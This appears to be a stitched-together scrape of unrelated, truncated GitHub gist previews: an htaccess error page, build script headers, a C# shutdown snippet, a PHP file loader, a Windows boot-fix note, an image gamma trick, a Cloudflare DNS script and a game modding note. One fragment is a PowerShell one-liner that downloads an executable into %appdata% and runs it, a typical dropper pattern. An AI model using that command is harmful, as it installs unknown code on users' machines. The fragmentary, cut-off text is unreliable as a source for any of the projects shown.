https://github.com/DamRsn/NeuralNote
https://github.com/BShakhovsky/PolyphonicPianoTranscription
| # HTTP Status Cats | |
| # Apache (htaccess) config created by @dave1010 | |
| # Licensed CC BY 2.0 | |
| # Images CC BY 2.0, from GirlieMac's photostream: | |
| # http://www.flickr.com/photos/girliemac/sets/72157628409467125/with/6508023065/ | |
| # Usage: copy save this file as .htaccess or add it to your httpd.conf | |
| ErrorDocument 404 '<a href="http://www.flickr.com/photos/girliemac/6508022985/" title="404 - Not Found by GirlieMac, on Flickr"><img src="http://farm8.staticflickr.com/7172/6508022985_b22200ced0.jpg" width="500" height="400" alt="404 - Not Found"></a>' |
| #!/bin/bash | |
| # If this doesn't work, ensure you have UNIX line endings in this file | |
| # (\n, not \r\n.) You can use Notepad++ to switch them. | |
| # Cygwin package requirements: gcc-mingw, pkg-config | |
| # If you want to pass -z to mkbundle: mingw-zlib1, mingw-zlib-devel | |
| # crash immediately if anything bad happens | |
| set -o errexit | |
| set -o nounset |
| using System.Diagnostics; | |
| namespace Reboot | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { | |
| ProcessStartInfo psi = new ProcessStartInfo(); | |
| psi.FileName = "shutdown.exe"; |
| <?php | |
| /* | |
| This code handles loading a file from the /protected-directory/ directory. | |
| (!) Be sure to change line 44 below to point to your protected directory if something other than /protected/ | |
| (!) Be sure to change line 64 below to check the levels you need. | |
| (!) Add this code to your active theme's functions.php or a custom plugin. | |
| (!) You should have a corresponding bit of code in your Apache .htaccess file to redirect files to this script. e.g. | |
| ### |
| Today, after working with Windows for over 15 years now, I finally came across the solution to the | |
| dreadfull BSOD STOP 0x0000007B after replacing the motherboard of a computer, or after moving the | |
| harddrive to another computer, or after doing a P2V, or after ... you get the point. | |
| Requirements: | |
| - Windows install / boot CD | |
| - Chipset / Mobo / Storage drivers of the new motherboard or storage controller | |
| Steps: | |
| - extract all the drivers to a USB thumb drive |
| #!/bin/sh | |
| # PNG Gamma trick (by @marcan42 / marcan@marcan.st) | |
| # | |
| # This script implements an improved version of the gamma trick used to make | |
| # thumbnail images on reddit/4chan look different from the full-size image. | |
| # | |
| # Sample output (SFW; images by @Miluda): | |
| # https://mrcn.st/t/homura_gamma_trick.png | |
| # https://www.reddit.com/r/test/comments/6edthw/ (click for fullsize) | |
| # https://twitter.com/marcan42/status/869855956842143744 |
| powershell -c "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'ENTER URL' -OutFile '%appdata%\a.exe'; %appdata%\a.exe" |
| #!/bin/bash | |
| # Author: Jari Pennanen | |
| # Url: https://gist.github.com/Ciantic/4e543f2d878a87a38c25032d5c727bf2 | |
| AUTH_EMAIL="john.doe@example.com" # Your Cloudflare email | |
| AUTH_KEY="" # Get this from My profile -> API Keys -> View | |
| DOMAIN="example.com" # main domain | |
| SUBDOMAIN="home.example.com" # set A and AAAA-record of this subdomain |
SirPlease and ProdigySim were allowed early access to the Last Stand beta to check mod compatibility. We have been working on testing some sourcemod extensions and plugins, as well as reverse engineering some of the server code to discover necessary GameData changes.
These are the high level results of our investigations. Be aware that the server binaries could change up to the release day an these may no be perfectly accurate. I hope these will be a helpful starting point and/or reference for other plugin makers who are validating their gamedata and patches.
CBaseEntity vtable has a new member:
14 CBaseEntity::ScriptGetModelName(void)const